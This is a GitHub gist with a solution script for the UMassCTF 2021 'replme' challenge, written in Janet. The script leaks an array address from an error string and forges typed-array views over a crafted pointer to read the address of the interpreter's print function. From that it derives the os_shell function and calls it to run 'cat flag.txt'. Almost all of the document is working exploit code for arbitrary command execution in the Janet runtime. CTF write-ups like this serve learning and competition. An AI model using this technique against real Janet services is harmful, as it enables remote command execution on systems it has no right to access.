Skip to content

Instantly share code, notes, and snippets.

@rick2600
Created Mar 30, 2021
Embed
What would you like to do?
UMassCTF 2021 - replme
# CTF: UMassCTF 21
# Challenge: replme
# Description: I found this new programming language and wanted people to be able to try it out. http://34.72.244.178:8085
# http://static.ctf.umasscybersec.org/pwn/8ff0476d-85f1-40f8-84ca-ade94b5b0169/janet.zip
(defn hex2n [x]
(var res 0)
(def reversed (reverse x))
(var c 0)
(for i 0 (length reversed)
(var v (get reversed i))
(if (>= v 65)
(set v (+ (- v 65) 10))
(set v (- v 48))
)
(+= res (+ (blshift v c)))
(+= c 4)
)
res
)
(defn leak [param]
(var leaked @{})
(try
(do
(param)
)
([err]
(print "Leaked array address: " (string/slice err 7 21))
(put leaked :hi (hex2n (string/slice err 9 13)))
(put leaked :lo (hex2n (string/slice err 13 21)))
)
)
leaked
)
(var array @[print])
(var leaked (leak array))
(var buffer (tarray/buffer 8))
(var buffer_float64_view (tarray/new :float64 1 1 0 buffer))
(var buffer_uint32_view (tarray/new :uint32 2 1 0 buffer))
(set (buffer_uint32_view 1) (+ 0xffff0000 (get leaked :hi)))
(set (buffer_uint32_view 0) (+ (get leaked :lo) 0x18))
# used to leak print (cfun_io_print) address
(var fake_buffer_uint32_view (tarray/new :uint32 10 1 0 (buffer_float64_view 0)))
# cfun_io_print + 0x3fd0 = &os_shell
(set (buffer_uint32_view 1) (get fake_buffer_uint32_view 1))
(set (buffer_uint32_view 0) (+ (get fake_buffer_uint32_view 0) 0x3fd0))
((buffer_float64_view 0) "cat flag.txt")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment